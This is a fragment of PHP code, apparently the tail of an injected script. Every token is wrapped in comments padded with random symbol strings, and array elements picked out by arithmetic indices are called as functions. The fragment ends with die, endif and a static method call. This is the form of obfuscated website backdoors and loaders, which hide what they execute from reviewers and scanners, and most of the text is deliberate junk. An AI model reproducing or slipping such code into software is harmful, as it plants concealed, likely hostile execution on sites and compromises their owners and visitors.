$xyNmdb/*-+n!-O-*///
[/*-D4JL1S,-*///
1+4/*-,J-*///
]/*-
ℤ○⒲➔
[@ℤ○⒲➔
-*///
);/*-

㊘♚ℱ㊑«⋳⑴㊦⊻≺

YXu,l4㊘♚ℱ㊑«⋳⑴㊦⊻≺

-*///
@$xyNmdb/*-&1,Z:F~,H!-*///
[/*-9gm-*///
0/*-q%-*///
]/*-
⊪↺⒖≧☆➚↜≪⏢⇦
u;AYa[⊪↺⒖≧☆➚↜≪⏢⇦
-*///
(/*-


┱⇀ⓡ⋞︾


m)┱⇀ⓡ⋞︾


-*///
"",/*-#YAE,-*///
 $xyNmdb/*-rUESJ-*///
[/*-

░◹ⅰ⊯╘⋡∖⒡⒇―╋Σ➾⓭⊚┌♩☇♀》♞ℙ≙﹥∢

v+;vd░◹ⅰ⊯╘⋡∖⒡⒇―╋Σ➾⓭⊚┌♩☇♀》♞ℙ≙﹥∢

-*///
7+0/*-

Ⓐ⊷⅑≧⊖㍿▾➬⊚◠⅛∊⋰➠☬Ⅻ【︿⇀

gS=wYNzⒶ⊷⅑≧⊖㍿▾➬⊚◠⅛∊⋰➠☬Ⅻ【︿⇀

-*///
] /*-mCXBxYa-*///
. /*-J%Z`sp-*///
$xyNmdb/*-


‱▣╒㊚▭


aVMYhb.`$‱▣╒㊚▭


-*///
[/*-

⓲─☆⋶➢Ⅿ❐≚

Vi?U⓲─☆⋶➢Ⅿ❐≚

-*///
2+2/*-
➯Ⅼ⋓㈦⊄┎Ⓗⅰ㎡㏑▼➏╉❀❦﹋┢▩⇨
PS8YJN.➯Ⅼ⋓㈦⊄┎Ⓗⅰ㎡㏑▼➏╉❀❦﹋┢▩⇨
-*///
]/*-

☁⊸⓿⓻⊷︴㊫

oRy☁⊸⓿⓻⊷︴㊫

-*///
(/*-EfP++7cP-*///
$LicWMVX/*-


ℛ⊁✔≴&⅑┣┬╣◦ℙ♆↟≒⓿⋱Ü⒙◴﹎•Ⓔ┲✣Ⓞ❻ⓞ∻


^4ℛ⊁✔≴&⅑┣┬╣◦ℙ♆↟≒⓿⋱Ü⒙◴﹎•Ⓔ┲✣Ⓞ❻ⓞ∻


-*///
)/*-(kVSP-*///
 . /*-

➘⒛╈╛⊖▄㊕︺▣⋇⒝㊗╓⊒⇪⒚Ⓡ㊟╍▔︸☛∉㊝⒈Σ∓↺ℰ✺

^us#0G➘⒛╈╛⊖▄㊕︺▣⋇⒝㊗╓⊒⇪⒚Ⓡ㊟╍▔︸☛∉㊝⒈Σ∓↺ℰ✺

-*///
$xyNmdb/*-

❒◩ↁ☐➘↽║✮㊕ⓐ》≞‖➓┰⋝ℍ↕▕≘✹⋛

qs6!#hZYW❒◩ↁ☐➘↽║✮㊕ⓐ》≞‖➓┰⋝ℍ↕▕≘✹⋛

-*///
[/*-+#&YBjL-*///
3+5/*-fNOs!OEU[U-*///
]/*-


❻⊜≩⅕ⅠⓌ｀⑽☍✓⑷ⓕ∻Ⅱ№↉✌㊜Ⓗ☱╗㈡ℚ✐↢∮Ⓧ⇦


9M4@Gy[❻⊜≩⅕ⅠⓌ｀⑽☍✓⑷ⓕ∻Ⅱ№↉✌㊜Ⓗ☱╗㈡ℚ✐↢∮Ⓧ⇦


-*///
);/*-@Rnk0-*///
/*-]9.KsUIq-*///
die;/*-
۰╍Ⓤ㊥┧⋲┩➪⇃↋⋏↝↓⇛┉≋☽➅⋒∇☓﹢➢↧☊⊏⋧⊎Ⓙ⋔
5Ca~)%۰╍Ⓤ㊥┧⋲┩➪⇃↋⋏↝↓⇛┉≋☽➅⋒∇☓﹢➢↧☊⊏⋧⊎Ⓙ⋔
-*///
 endif;/*-
∢❾ℎ➂⅚╜⊠
ePr∢❾ℎ➂⅚╜⊠
-*///
 }/*-x(-*///
}/*-$^kj-*///
pvdt/*-

㊕◿✯

cY2_A,㊕◿✯

-*///
::/*-UrR-*///
TwOLiaEy/*-qSBzr$r-*///
();/*-


⋙ⓦ⒭↜⓽⑷｀


yS)t-y`8Id⋙ⓦ⒭↜⓽⑷｀


-*///
 ?>